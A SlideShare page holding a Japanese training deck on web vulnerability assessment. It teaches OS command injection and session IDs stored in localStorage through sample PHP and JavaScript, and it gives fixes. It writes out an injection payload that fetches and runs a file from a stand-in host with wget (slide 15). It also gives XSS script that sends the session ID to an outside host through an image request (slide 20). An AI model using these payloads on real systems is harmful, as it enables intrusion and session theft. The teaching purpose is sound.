Submit Search
Upload
ソースで学ぶ脆弱性診断 - SmartTechGeeks #2
•
0 likes
•
622 views
T
tobaru_yuta
Follow
下記について記載。 OSコマンドインジェクション ローカルストレージへの機密情報の保持
Read less
Read more
Internet
Report
Share
Report
Share
1 of 30
Download now
Download to read offline
Recommended
文字コードに起因する脆弱性とその対策
文字コードに起因する脆弱性とその対策
Hiroshi Tokumaru
ctfで学ぼうリバースエンジニアリング
ctfで学ぼうリバースエンジニアリング
junk_coken
Edomae 2015 - マルウェアを解析してみよう
Edomae 2015 - マルウェアを解析してみよう
Satoshi Mimura
「C言語規格&MISRA-C:みんなで楽しいCプログラミング」NGK2013B名古屋合同懇親会2013忘年会昼の部
「C言語規格&MISRA-C:みんなで楽しいCプログラミング」NGK2013B名古屋合同懇親会2013忘年会昼の部
Kiyoshi Ogawa
Format string Attack
Format string Attack
icchy
文字コードに起因する脆弱性とその対策(増補版)
文字コードに起因する脆弱性とその対策(増補版)
Hiroshi Tokumaru
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
CODE BLUE
Spring Boot × Vue.jsでSPAを作る
Spring Boot × Vue.jsでSPAを作る
Go Miyasaka
Recommended
文字コードに起因する脆弱性とその対策
文字コードに起因する脆弱性とその対策
Hiroshi Tokumaru
ctfで学ぼうリバースエンジニアリング
ctfで学ぼうリバースエンジニアリング
junk_coken
Edomae 2015 - マルウェアを解析してみよう
Edomae 2015 - マルウェアを解析してみよう
Satoshi Mimura
「C言語規格&MISRA-C:みんなで楽しいCプログラミング」NGK2013B名古屋合同懇親会2013忘年会昼の部
「C言語規格&MISRA-C:みんなで楽しいCプログラミング」NGK2013B名古屋合同懇親会2013忘年会昼の部
Kiyoshi Ogawa
Format string Attack
Format string Attack
icchy
文字コードに起因する脆弱性とその対策(増補版)
文字コードに起因する脆弱性とその対策(増補版)
Hiroshi Tokumaru
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
CODE BLUE
Spring Boot × Vue.jsでSPAを作る
Spring Boot × Vue.jsでSPAを作る
Go Miyasaka
CTFはとんでもないものを 盗んでいきました。私の時間です…
CTFはとんでもないものを 盗んでいきました。私の時間です…
Hiromu Yakura
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
ken_kitahara
セキュリティを楽しむ(CTFとbugbountyの始め方)
セキュリティを楽しむ(CTFとbugbountyの始め方)
kazkiti
最近のBurp Suiteについて調べてみた
最近のBurp Suiteについて調べてみた
zaki4649
Proxy War
Proxy War
zaki4649
入社1年目のプログラミング初心者がSpringを学ぶための手引き
入社1年目のプログラミング初心者がSpringを学ぶための手引き
土岐 孝平
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
Masakazu Ikeda
型安全性入門
型安全性入門
Akinori Abe
初心者向けCTFのWeb分野の強化法
初心者向けCTFのWeb分野の強化法
kazkiti
Spring Bootをはじめる時にやるべき10のこと
Spring Bootをはじめる時にやるべき10のこと
心 谷本
PWNの超入門 大和セキュリティ神戸 2018-03-25
PWNの超入門 大和セキュリティ神戸 2018-03-25
Isaac Mathis
Spring と TDD
Spring と TDD
Takeshi Ogawa
XSS再入門
XSS再入門
Hiroshi Tokumaru
テスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるな
Kentaro Matsui
さくっと理解するSpring bootの仕組み
さくっと理解するSpring bootの仕組み
Takeshi Ogawa
フリーでやろうぜ!セキュリティチェック!
フリーでやろうぜ!セキュリティチェック!
zaki4649
フリーでできるWebセキュリティ(burp編)
フリーでできるWebセキュリティ(burp編)
abend_cve_9999_0001
カスタムメモリマネージャと高速なメモリアロケータについて
カスタムメモリマネージャと高速なメモリアロケータについて
alwei
SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」
Masato Kinugawa
低レイヤー入門
低レイヤー入門
demuyan
Webアプリケーション脆弱性診断について
Webアプリケーション脆弱性診断について
tobaru_yuta
MongoDBの脆弱性診断 - smarttechgeeks
MongoDBの脆弱性診断 - smarttechgeeks
tobaru_yuta
More Related Content
What's hot
CTFはとんでもないものを 盗んでいきました。私の時間です…
CTFはとんでもないものを 盗んでいきました。私の時間です…
Hiromu Yakura
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
ken_kitahara
セキュリティを楽しむ(CTFとbugbountyの始め方)
セキュリティを楽しむ(CTFとbugbountyの始め方)
kazkiti
最近のBurp Suiteについて調べてみた
最近のBurp Suiteについて調べてみた
zaki4649
Proxy War
Proxy War
zaki4649
入社1年目のプログラミング初心者がSpringを学ぶための手引き
入社1年目のプログラミング初心者がSpringを学ぶための手引き
土岐 孝平
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
Masakazu Ikeda
型安全性入門
型安全性入門
Akinori Abe
初心者向けCTFのWeb分野の強化法
初心者向けCTFのWeb分野の強化法
kazkiti
Spring Bootをはじめる時にやるべき10のこと
Spring Bootをはじめる時にやるべき10のこと
心 谷本
PWNの超入門 大和セキュリティ神戸 2018-03-25
PWNの超入門 大和セキュリティ神戸 2018-03-25
Isaac Mathis
Spring と TDD
Spring と TDD
Takeshi Ogawa
XSS再入門
XSS再入門
Hiroshi Tokumaru
テスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるな
Kentaro Matsui
さくっと理解するSpring bootの仕組み
さくっと理解するSpring bootの仕組み
Takeshi Ogawa
フリーでやろうぜ!セキュリティチェック!
フリーでやろうぜ!セキュリティチェック!
zaki4649
フリーでできるWebセキュリティ(burp編)
フリーでできるWebセキュリティ(burp編)
abend_cve_9999_0001
カスタムメモリマネージャと高速なメモリアロケータについて
カスタムメモリマネージャと高速なメモリアロケータについて
alwei
SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」
Masato Kinugawa
低レイヤー入門
低レイヤー入門
demuyan
What's hot
(20)
CTFはとんでもないものを 盗んでいきました。私の時間です…
CTFはとんでもないものを 盗んでいきました。私の時間です…
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
セキュリティを楽しむ(CTFとbugbountyの始め方)
セキュリティを楽しむ(CTFとbugbountyの始め方)
最近のBurp Suiteについて調べてみた
最近のBurp Suiteについて調べてみた
Proxy War
Proxy War
入社1年目のプログラミング初心者がSpringを学ぶための手引き
入社1年目のプログラミング初心者がSpringを学ぶための手引き
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
型安全性入門
型安全性入門
初心者向けCTFのWeb分野の強化法
初心者向けCTFのWeb分野の強化法
Spring Bootをはじめる時にやるべき10のこと
Spring Bootをはじめる時にやるべき10のこと
PWNの超入門 大和セキュリティ神戸 2018-03-25
PWNの超入門 大和セキュリティ神戸 2018-03-25
Spring と TDD
Spring と TDD
XSS再入門
XSS再入門
テスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるな
さくっと理解するSpring bootの仕組み
さくっと理解するSpring bootの仕組み
フリーでやろうぜ!セキュリティチェック!
フリーでやろうぜ!セキュリティチェック!
フリーでできるWebセキュリティ(burp編)
フリーでできるWebセキュリティ(burp編)
カスタムメモリマネージャと高速なメモリアロケータについて
カスタムメモリマネージャと高速なメモリアロケータについて
SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」
低レイヤー入門
低レイヤー入門
Viewers also liked
Webアプリケーション脆弱性診断について
Webアプリケーション脆弱性診断について
tobaru_yuta
MongoDBの脆弱性診断 - smarttechgeeks
MongoDBの脆弱性診断 - smarttechgeeks
tobaru_yuta
Chuyên
Chuyên
caidatmaybamgio
Pengertian dan Sejarah Software Open Source
Pengertian dan Sejarah Software Open Source
Barmed Studio
Maestro conoce a sus alumnos
Maestro conoce a sus alumnos
Frankling Aguilar
Talia's Resume'
Talia's Resume'
Talia Wilson
Дмитрий Мартынов: О подписке на газеты и журналы в I полугодии 2017 года и п...
Дмитрий Мартынов: О подписке на газеты и журналы в I полугодии 2017 года и п...
Ассоциация распространителей печатной продукции
Pak janggut kapal dari es
Pak janggut kapal dari es
linda hindiana
Web applicationpenetrationtest その3
Web applicationpenetrationtest その3
Tetsuya Hasegawa
Tipos de condicionales
Tipos de condicionales
angelzerpa12
Refugios temporales
Refugios temporales
Ale1808
担当Pjのciにserverless frameworkを導入した話
担当Pjのciにserverless frameworkを導入した話
masaya tawata
HFCC 創新場域工作坊
HFCC 創新場域工作坊
HCGO
email in our daily life
email in our daily life
Binay Sharma
Tablete de-stil-de-viata-sanatatea
Tablete de-stil-de-viata-sanatatea
saraviola
Dockerでデプロイ
Dockerでデプロイ
oshiro_seiya
Presentation employees Nutricia
Presentation employees Nutricia
InspanningLoont
Danone Nutricia Case - The Data-Driven Mother's Journey by Christopher Nash, ...
Danone Nutricia Case - The Data-Driven Mother's Journey by Christopher Nash, ...
Komfo
Gender differences in symptomatology of autism spectrum disorder
Gender differences in symptomatology of autism spectrum disorder
Laura Mattys
Bioaccumulation & biomagnifications
Bioaccumulation & biomagnifications
Nur Atikah Amira
Viewers also liked
(20)
Webアプリケーション脆弱性診断について
Webアプリケーション脆弱性診断について
MongoDBの脆弱性診断 - smarttechgeeks
MongoDBの脆弱性診断 - smarttechgeeks
Chuyên
Chuyên
Pengertian dan Sejarah Software Open Source
Pengertian dan Sejarah Software Open Source
Maestro conoce a sus alumnos
Maestro conoce a sus alumnos
Talia's Resume'
Talia's Resume'
Дмитрий Мартынов: О подписке на газеты и журналы в I полугодии 2017 года и п...
Дмитрий Мартынов: О подписке на газеты и журналы в I полугодии 2017 года и п...
Pak janggut kapal dari es
Pak janggut kapal dari es
Web applicationpenetrationtest その3
Web applicationpenetrationtest その3
Tipos de condicionales
Tipos de condicionales
Refugios temporales
Refugios temporales
担当Pjのciにserverless frameworkを導入した話
担当Pjのciにserverless frameworkを導入した話
HFCC 創新場域工作坊
HFCC 創新場域工作坊
email in our daily life
email in our daily life
Tablete de-stil-de-viata-sanatatea
Tablete de-stil-de-viata-sanatatea
Dockerでデプロイ
Dockerでデプロイ
Presentation employees Nutricia
Presentation employees Nutricia
Danone Nutricia Case - The Data-Driven Mother's Journey by Christopher Nash, ...
Danone Nutricia Case - The Data-Driven Mother's Journey by Christopher Nash, ...
Gender differences in symptomatology of autism spectrum disorder
Gender differences in symptomatology of autism spectrum disorder
Bioaccumulation & biomagnifications
Bioaccumulation & biomagnifications
Similar to ソースで学ぶ脆弱性診断 - SmartTechGeeks #2
ざっくり学ぼうあぶないWebアプリの脆弱性
ざっくり学ぼうあぶないWebアプリの脆弱性
shuna roo
Mix Leap 0214 security
Mix Leap 0214 security
adachi tomohiro
診断ツールを作ってみようと思う
診断ツールを作ってみようと思う
abend_cve_9999_0001
【Explanatory material】Securify_v1.2.pptx
【Explanatory material】Securify_v1.2.pptx
mihokawagoe
~2018年Webセキュリティ最前線セミナー~ 今や従来通りの対策ではWebセキュリティが万全ではないこれだけの理由
~2018年Webセキュリティ最前線セミナー~ 今や従来通りの対策ではWebセキュリティが万全ではないこれだけの理由
グローバルセキュリティエキスパート株式会社(GSX)
デブサミ2013【15-C-8】セキュリティ要求仕様モデルプランで日本は変わるか?(百瀬昌幸氏)
デブサミ2013【15-C-8】セキュリティ要求仕様モデルプランで日本は変わるか?(百瀬昌幸氏)
Developers Summit
なぜ今、セキュリティ人材の育成がこんなにも叫ばれているのだろうか?
なぜ今、セキュリティ人材の育成がこんなにも叫ばれているのだろうか?
グローバルセキュリティエキスパート株式会社(GSX)
AndroidでのAntiVirus
AndroidでのAntiVirus
Shoko Araki
WisePoint Shibboleth presentation at Oosaka
WisePoint Shibboleth presentation at Oosaka
Katsumi Yamashita
脆弱性診断って何をどうすればいいの?(おかわり)
脆弱性診断って何をどうすればいいの?(おかわり)
脆弱性診断研究会
0325できる?どうやる!word pressのセキュリティ運用
0325できる?どうやる!word pressのセキュリティ運用
真琴 平賀
Webセキュリティエンジニアから見るAWSセキュリティ
Webセキュリティエンジニアから見るAWSセキュリティ
adachi tomohiro
20171115 社長5年会
20171115 社長5年会
Takayuki Horimoto
なぜ自社で脆弱性診断を行うべきなのか
なぜ自社で脆弱性診断を行うべきなのか
Sen Ueno
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501
Sen Ueno
【Securify】Partner program.pdf
【Securify】Partner program.pdf
mihokawagoe
[Japan Tech summit 2017] CLD 023
[Japan Tech summit 2017] CLD 023
Microsoft Tech Summit 2017
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜
Riotaro OKADA
DVWAで爆上げWebAppセキュリティスキル@shunaroo
DVWAで爆上げWebAppセキュリティスキル@shunaroo
shuna roo
I-C-I Webセキュリティサービスのご紹介
I-C-I Webセキュリティサービスのご紹介
Mitsuhiro Kouta
Similar to ソースで学ぶ脆弱性診断 - SmartTechGeeks #2
(20)
ざっくり学ぼうあぶないWebアプリの脆弱性
ざっくり学ぼうあぶないWebアプリの脆弱性
Mix Leap 0214 security
Mix Leap 0214 security
診断ツールを作ってみようと思う
診断ツールを作ってみようと思う
【Explanatory material】Securify_v1.2.pptx
【Explanatory material】Securify_v1.2.pptx
~2018年Webセキュリティ最前線セミナー~ 今や従来通りの対策ではWebセキュリティが万全ではないこれだけの理由
~2018年Webセキュリティ最前線セミナー~ 今や従来通りの対策ではWebセキュリティが万全ではないこれだけの理由
デブサミ2013【15-C-8】セキュリティ要求仕様モデルプランで日本は変わるか?(百瀬昌幸氏)
デブサミ2013【15-C-8】セキュリティ要求仕様モデルプランで日本は変わるか?(百瀬昌幸氏)
なぜ今、セキュリティ人材の育成がこんなにも叫ばれているのだろうか?
なぜ今、セキュリティ人材の育成がこんなにも叫ばれているのだろうか?
AndroidでのAntiVirus
AndroidでのAntiVirus
WisePoint Shibboleth presentation at Oosaka
WisePoint Shibboleth presentation at Oosaka
脆弱性診断って何をどうすればいいの?(おかわり)
脆弱性診断って何をどうすればいいの?(おかわり)
0325できる?どうやる!word pressのセキュリティ運用
0325できる?どうやる!word pressのセキュリティ運用
Webセキュリティエンジニアから見るAWSセキュリティ
Webセキュリティエンジニアから見るAWSセキュリティ
20171115 社長5年会
20171115 社長5年会
なぜ自社で脆弱性診断を行うべきなのか
なぜ自社で脆弱性診断を行うべきなのか
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501
【Securify】Partner program.pdf
【Securify】Partner program.pdf
[Japan Tech summit 2017] CLD 023
[Japan Tech summit 2017] CLD 023
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜
DVWAで爆上げWebAppセキュリティスキル@shunaroo
DVWAで爆上げWebAppセキュリティスキル@shunaroo
I-C-I Webセキュリティサービスのご紹介
I-C-I Webセキュリティサービスのご紹介
ソースで学ぶ脆弱性診断 - SmartTechGeeks #2
1.
ソースで学ぶ脆弱性診断 SmartTechGeeks #2 桃原 裕太
2.
名前 桃原 裕太
/ とうばる ゆうた 所属 株式会社 シーエー・アドバンス 技術統括本部 経歴 前職 ・ECサイト等の開発 株式会社 シーエー・アドバンス ・社内ツールの開発 ・脆弱性診断の業務に携わって約4年 業務 Webアプリケーション脆弱性診断 ・PCブラウザ向けアプリ ・SPブラウザ向けアプリ ・Androidアプリ ・iOSアプリ 自己紹介
3.
脆弱性診断とは Webサイトに脆弱性がないか、擬似攻撃を行って調査しています。 サービスを健全な状態に保つことで外部からの攻撃を防ぎます。
4.
注意 本資料で紹介した内容について 他者が管理しているサービスでは 試さないようにお願いします。
5.
今回のテーマ サンプルソースをもとに、 脆弱性について一緒に考えていきたいと思います。 ❏ どのような脆弱性か? ❏ どのような影響があるのか? ❏
どのように対策したらいいの?
6.
脆弱性の例 クロスサイトスクリプティング SQLインジェクション OSコマンドインジェクション アクセス権 等
7.
最近だと… WordPress の脆弱性がありましたね 【参考URL】https://www.ipa.go.jp/security/ciadr/vul/20170206-wordpress.html 対 象 WordPress
4.7.0 から WordPress 4.7.1 影 響 REST API の脆弱性を悪用することで コンテンツが改ざんされる 対 策 WordPress 4.7.2 へアップデートする
8.
問題!
9.
問題(どのような脆弱性があるでしょうか?) http://hoge.com/order/summary <?php // 受注情報の集計バッチを動かす require
'common.php'; // 未ログインはログインページへリダイレクトする if(!is_login()) header("Location: http://hoge.com/login"); exit(); $yyyymm = $_POST["yyyymm"]; // 201701 // バックグラウンドでPHPファイルを動かす system("php /batch/order_summary.php $yyyymm &");
10.
問題(どのような脆弱性があるでしょうか?) http://hoge.com/order/summary <?php // 受注情報の集計バッチを動かす require
'common.php'; // 未ログインはログインページへリダイレクトする if(!is_login()) header("Location: http://hoge.com/login"); exit(); $yyyymm = $_POST["yyyymm"]; // 201701;sleep 10; // バックグラウンドでPHPファイルを動かす system("php /batch/order_summary.php $yyyymm &");
11.
問題(どのような脆弱性があるでしょうか?) http://hoge.com/order/summary <?php // 受注情報の集計バッチを動かす require
'common.php'; // 未ログインはログインページへリダイレクトする if(!is_login()) header("Location: http://hoge.com/login"); exit(); $yyyymm = $_POST["yyyymm"]; // 201701;sleep 10; // バックグラウンドでPHPファイルを動かす system("php /batch/order_summary.php $yyyymm &");
12.
OSコマンドインジェクション http://hoge.com/order/summary <?php // 受注情報の集計バッチを動かす require
'common.php'; // 未ログインはログインページへリダイレクトする if(!is_login()) header(“Location: http://hoge.com/login"); exit(); $yyyymm = $_POST[“yyyymm"]; // 201701;sleep 10; // バックグラウンドでPHPファイルを動かす system("php /batch/order_summary.php $yyyymm &"); ①バッチを動かす php /batch/order_summary.php 201701; ②sleepコマンドで10秒停止 sleep 10;
13.
OSコマンドインジェクション なぜsleepコマンド? ❏ yyyymm=201701 の場合 ※レスポンスが返ってくるまでに1秒かかる ❏
yyyymm=201701;sleep 10; の場合 ※レスポンスが返ってくるまでに11秒かかる
14.
OSコマンドインジェクション 外部の人でも sleepコマンドを投げることで 脆弱性があるか判別できます ※試す場合は、許可を得たサイトだけにしてください。 他者のサービスで試すと不正アクセスで 訴えられる恐れがあります
15.
OSコマンドインジェクション 影響 ❏ 不正なファイルのDLと実行 ❏ ;wget
http://example.com/evil.txt -O evil.php;php evil.php; ❏ ツールの取得(yum, apt-get) ❏ ファイル削除 (rm) ❏ OSシャットダウン(shutdown) ❏ その他いろいろ
16.
OSコマンドインジェクション 対策 ※一例ですが… ❏ OSコマンドに渡すパラメータを 安全な関数によりエスケープする。 (すべて数字で構成されているか) ❏ 外部から入力された文字列を コマンドラインのパラメータに渡さない (画面ではなく、バックエンドでの定期実行に変える)
17.
次の問題!
18.
問題(どのような脆弱性があるでしょうか?) http://hoge.com/login.php <!-- javascript --> //
ログイン処理 fetch('/login_fetch.php', { method: 'POST', body: new FormData(document.getElementById('form1')), }) // レスポンス取得 .then(response => response.json()) // WebストレージにセッションIDを格納 .then(json => localStorage.setItem('session_id', (json.isLogin) ? json.session_id : ''));
19.
問題(どのような脆弱性があるでしょうか?) http://hoge.com/login.php <!-- javascript --> //
ログイン処理 fetch('/login_fetch.php', { method: 'POST', body: new FormData(document.getElementById('form1')), }) // レスポンス取得 .then(response => response.json()) // WebストレージにセッションIDを格納 .then(json => localStorage.setItem('session_id', (json.isLogin) ? json.session_id : '')); WebStorageにセッションIDを保存している
20.
WebStorageへの機密情報の保存 セッションIDを盗まれてしまう可能性があります セッションIDが盗まれる例 ※サイト内にXSSがある場合になります… 1. XSSを利用して、下記scriptを埋め込みます。 2. 結果、罠サイトへアクセスする際にセッションIDが漏洩します。 <!--
javascript --> ses_id = localStorage.getItem('session_id'); img = $('<img src="http://fuga.com/1.png?session_id='+ses_id+'">'); $('body').append(img); // bodyの一番下にimgタグ追加
21.
WebStorageへの機密情報の保存 セッション情報が送信されたサイトのアクセスログ 192.168.99.1 - -
[08/Feb/2017:06:06:04 +0000] "GET/1.png?session_id=s1234 HTTP/1.1" 404 497 "http://192.168.99.100/xss.php" "Mozilla/5.0 (Windows NT 6.1; Win64;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" GET/1.png?session_id=s1234 HTTP/1.1 アクセスログに残っている "s1234" を使うことで 対象サイトでなりすましできる
22.
WebStorageへの機密情報の保存 影響 XSSと組み合わせることでデータの取得や設定が可能に ・セッションIDの取得や上書き ・個人情報の取得 等 対策(一例) セッション情報はCookieで保持するようにします。 HttponlyやSecure属性を設定し、適切に保護。
23.
実際に脆弱性診断する ときはどうしているか?
24.
実際に脆弱性診断するときはどうしているか 診断ツールを使って確認しています。 ・自動診断(XSS, インジェクション攻撃 ...
etc) ・手動診断(CSRF, アクセス権 ... etc) ツールで検出しやすいものは自動診断 それ以外項目は手動診断しています。
25.
脆弱性診断で使うツール 診断効率をあげるためのツールのご紹介 ❏ Burp Suite ※弊社でも使ってます ❏
OWASP ZAP ❏ Fiddler ※試す場合は、許可を得たサイトだけにしてください。 他者のサービスで試すと不正アクセスで訴えられる恐れがあります。
26.
もし脆弱性診断に興味が出てきたら(その1) IPAでセキュリティ理解を深めるための資料を公開しています。(無料) 安全なウェブサイトの作り方 https://www.ipa.go.jp/security/vuln/websecurity.html 脆弱性体験学習ツール AppGoat https://www.ipa.go.jp/security/vuln/appgoat/
27.
もし脆弱性診断に興味が出てきたら(その2) http://qiita.com/organizations/ca-adv にもあるので解いてみてください
28.
おわりに
29.
まとめ、と補足 ❏ Webアプリケーション脆弱性診断について 少しでも理解してもらえると幸いです。 ❏ OSコマンドインジェクションは危ない! ❏
ふつうに開発してるだけだと脆弱性は入ってしまうので、ぜひ 対策をご検討ください。 ❏ セキュリティの専門家に依頼する ❏ 社内でセキュリティ意識を高める ... etc
30.
ご清聴ありがとうございました
Download now